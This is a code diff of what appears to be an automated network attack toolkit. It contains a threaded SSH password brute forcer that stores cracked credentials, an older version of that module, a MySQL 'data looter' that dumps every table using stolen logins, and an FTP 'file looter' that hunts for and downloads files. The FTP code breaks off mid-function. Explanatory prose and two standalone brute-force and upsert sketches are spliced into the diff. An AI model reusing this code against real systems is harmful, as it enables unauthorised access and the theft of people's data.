"""Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
timeout = float(getattr(self.shared_data, "ssh_connect_timeout_s", timeout))
try:
ssh.connect(
hostname=adresse_ip,
username=user,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
look_for_keys=False, # avoid slow key probing
allow_agent=False, # avoid SSH agent delays
)
return True
except (paramiko.AuthenticationException, socket.timeout, socket.error, paramiko.SSHException):
return False
except Exception as e:
logger.debug(f"SSH connect unexpected error {adresse_ip} {user}: {e}")
return False
finally:
try:
ssh.close()
except Exception:
pass
# ---- Robust DB upsert fallback ------------------------------------------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
"""
Insert-or-update without relying on ON CONFLICT columns.
Works even if your UNIQUE index uses expressions (e.g., COALESCE()).
"""
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
# 1) Insert if missing
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ssh',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
# 2) Update password/hostname if present (or just inserted)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ssh'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE("database",'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
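A minimal, self-contained sketch of this two-step upsert against plain `sqlite3` (the in-memory table, index, and sample values are illustrative, not Bjorn's real schema):

```python
import sqlite3

# Two-step upsert: INSERT OR IGNORE, then UPDATE. This works even when the
# UNIQUE index uses COALESCE() expressions, which makes a plain
# "ON CONFLICT(col, ...)" clause fail with
# "ON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint".
conn = sqlite3.connect(":memory:")
conn.execute('CREATE TABLE creds('
             'service TEXT, mac_address TEXT, ip TEXT, '
             '"user" TEXT, "password" TEXT, port INTEGER)')
conn.execute("""CREATE UNIQUE INDEX ux_creds ON creds(
    service, COALESCE(mac_address,''), COALESCE(ip,''),
    COALESCE("user",''), COALESCE(port,0))""")

def upsert_cred(mac, ip, user, password, port):
    key = ("ssh", mac or "", ip or "", user or "", int(port or 0))
    # 1) Insert if the key tuple is missing (the unique index deduplicates).
    conn.execute("INSERT OR IGNORE INTO creds VALUES(?,?,?,?,?,?)",
                 ("ssh", mac or "", ip or "", user or "",
                  password or "", int(port or 0)))
    # 2) Update the password whether the row existed or was just inserted.
    conn.execute("""UPDATE creds SET "password"=?
        WHERE service=? AND COALESCE(mac_address,'')=?
          AND COALESCE(ip,'')=? AND COALESCE("user",'')=?
          AND COALESCE(port,0)=?""",
                 (password or "",) + key)

upsert_cred("aa:bb:cc", "10.0.0.5", "root", "first", 22)
upsert_cred("aa:bb:cc", "10.0.0.5", "root", "second", 22)  # same key, new password
rows = conn.execute('SELECT "password" FROM creds').fetchall()
```

The second call matches the same key tuple, so the table keeps a single row whose password is the latest one seen.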
# ---- Worker / Queue / Threads -------------------------------------------
def worker(self, success_flag):
"""Worker thread to process items in the queue (bruteforce attempts)."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ssh_connect(adresse_ip, user, password, port=port):
with self.lock:
# Persist success into DB.creds
try:
self.shared_data.db.insert_cred(
service="ssh",
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
# Specific fix: fallback manual upsert
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None
)
else:
logger.error(f"insert_cred failed for {adresse_ip} {user}: {e}")
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_ssh", 0) > 0:
time.sleep(self.shared_data.timewait_ssh)
def run_bruteforce(self, adresse_ip, port):
"""
Called by the orchestrator with a single IP + port.
Builds the queue (users x passwords) and launches threads.
"""
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SSH dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("SSH brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
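The worker/queue machinery above, reduced to a dependency-free skeleton (`check` stands in for `ssh_connect`; all names here are illustrative):

```python
import threading
from queue import Queue, Empty

def bruteforce(users, passwords, check, max_threads=8):
    """Try every (user, password) pair with a bounded worker pool.

    Mirrors run_bruteforce/worker: a shared Queue feeds daemon threads,
    a lock guards the results list, and a one-element list acts as the
    mutable success flag shared across threads.
    """
    q = Queue()
    for u in users:
        for p in passwords:
            q.put((u, p))
    hits, lock, found = [], threading.Lock(), [False]

    def worker():
        while True:
            try:
                u, p = q.get_nowait()   # non-blocking: exit when drained
            except Empty:
                return
            try:
                if check(u, p):
                    with lock:
                        hits.append((u, p))
                        found[0] = True
            finally:
                q.task_done()

    threads = [threading.Thread(target=worker, daemon=True)
               for _ in range(min(max_threads, max(1, q.qsize())))]
    for t in threads:
        t.start()
    q.join()                            # wait until every pair was attempted
    return found[0], hits

ok, creds = bruteforce(["root", "admin"], ["123456", "toor"],
                       lambda u, p: (u, p) == ("root", "toor"))
```

Capping the pool at `min(8, tasks)` matches the module's choice for the Pi Zero: more threads than pending pairs would only add scheduling overhead.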

View File

@@ -1,198 +0,0 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Starting SSH attack... on port 22")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

View File

@@ -1,189 +1,252 @@
"""
steal_data_sql.py — SQL data looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
- DB.creds (service='sql') provides (user,password, database?).
- We connect first without DB to enumerate tables (excluding system schemas),
then connect per schema to export CSVs.
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
"""
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
import csv
from threading import Timer
from typing import List, Tuple, Dict, Optional
from sqlalchemy import create_engine, text
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
b_trigger = 'on_any:["on_cred_found:sql","on_service:sql"]'
b_requires = '{"all":[{"has_cred":"sql"},{"has_port":3306},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 60 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "1/86400" # at most 1 execution/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealDataSQL initialized.")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str, Optional[str]]]:
"""
Return list[(user,password,database)] for SQL service.
Prefer exact IP; also include by MAC if known. Dedup by (u,p,db).
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
d = row.get("database")
d = str(d).strip() if d is not None else None
key = (u, p, d or "")
if not u or (key in seen):
continue
seen.add(key)
out.append((u, p, d))
return out
# -------- SQL helpers --------
def connect_sql(self, ip: str, username: str, password: str, database: Optional[str] = None):
try:
# If no database is specified, connect without one
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
conn_str = f"mysql+pymysql://{username}:{password}@{ip}:{b_port}{db_part}"
engine = create_engine(conn_str, connect_args={"connect_timeout": 10})
# quick test
with engine.connect() as _:
pass
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
logger.info(f"Connected SQL {ip} as {username}" + (f" db={database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
logger.error(f"SQL connect error {ip} {username}" + (f" db={database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
Returns list of (table_name, schema_name) excluding system schemas.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
logger.info("Table search interrupted.")
return []
query = """
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
q = text("""
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE='BASE TABLE'
AND TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys')
""")
with engine.connect() as conn:
rows = conn.execute(q).fetchall()
return [(r[0], r[1]) for r in rows]
except Exception as e:
logger.error(f"Error finding tables: {e}")
logger.error(f"find_tables error: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
def steal_data(self, engine, table: str, schema: str, local_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
logger.info("Data steal interrupted.")
return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
q = text(f"SELECT * FROM `{schema}`.`{table}`")
with engine.connect() as conn:
result = conn.execute(q)
headers = result.keys()
os.makedirs(local_dir, exist_ok=True)
out = os.path.join(local_dir, f"{schema}_{table}.csv")
with open(out, "w", newline="", encoding="utf-8") as f:
writer = csv.writer(f)
writer.writerow(headers)
for row in result:
writer.writerow(row)
logger.success(f"Dumped {schema}.{table} -> {out}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
logger.error(f"Dump error {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in self.b_parent_action(row):
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filter the credentials for this specific IP
ip_credentials = df[df['IP Address'] == ip]
# Build (username, password, database) tuples
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
logger.info(f"Found {len(credentials)} credential combinations for {ip}")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SQL credentials in DB for {ip}")
if not creds:
logger.error(f"No SQL credentials for {ip}. Skipping.")
return 'failed'
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def _timeout():
if not self.sql_connected:
logger.error(f"No SQL connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
def timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
timer = Timer(240, timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
for username, password, database in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# First connect without a database to check global permissions
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
for username, password, _db in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
base_engine = self.connect_sql(ip, username, password, database=None)
if not base_engine:
continue
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
break
# Connect to the specific database to steal its data
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stolen data from {counttables} tables on {ip}:{port}")
tables = self.find_tables(base_engine)
if not tables:
continue
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
db_engine = self.connect_sql(ip, username, password, database=schema)
if not db_engine:
continue
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"sql/{mac}_{ip}/{schema}")
self.steal_data(db_engine, table, schema, local_dir)
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
logger.success(f"Stole data from {len(tables)} tables on {ip}")
success = True
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"SQL loot error {ip} {username}: {e}")
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
def b_parent_action(self, row):
"""
Get the parent action status from the row.
"""
return row.get(b_parent, {}).get(b_status, '')
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,198 +1,272 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
steal_files_ftp.py — FTP file looter (DB-backed)
FTP mode:
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
- IP -> (MAC, hostname) via DB.hosts.
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
# Action descriptors
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesFTP initialized")
def connect_ftp(self, ip, username, password):
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Establish an FTP connection.
Return list[(user,password)] from DB.creds for this target.
Prefer exact IP; also include by MAC if known. Dedup preserves order.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- FTP helpers --------
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
# Max recursion depth for directory traversal (avoids symlink loops)
_MAX_DEPTH = 5
def connect_ftp(self, ip: str, username: str, password: str, port: int = b_port) -> Optional[FTP]:
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.connect(ip, port, timeout=10)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
logger.info(f"Connected to {ip}:{port} via FTP as {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.info(f"FTP connect failed {ip}:{port} {username}: {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
def find_files(self, ftp: FTP, dir_path: str, depth: int = 0) -> List[str]:
files: List[str] = []
if depth > self._MAX_DEPTH:
logger.debug(f"Max recursion depth reached at {dir_path}")
return []
try:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
try:
ftp.cwd(item)
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd(item) # if ok -> directory
files.extend(self.find_files(ftp, os.path.join(dir_path, item), depth + 1))
ftp.cwd('..')
except Exception:
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
# not a dir => file candidate
if any(item.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(name in item for name in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
logger.error(f"FTP path error {dir_path}: {e}")
return files
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
# Check file size before downloading
try:
size = ftp.size(remote_file)
if size is not None and size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # SIZE not supported, try download anyway
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
